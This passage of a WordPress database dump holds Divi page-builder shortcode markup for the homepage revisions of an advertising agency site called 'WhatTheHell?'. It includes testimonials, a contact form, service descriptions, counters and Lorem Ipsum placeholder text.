variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:02:44','2020-08-07 20:02:44','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(584,1,'2020-08-07 20:06:48','2020-08-07 20:06:48','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" 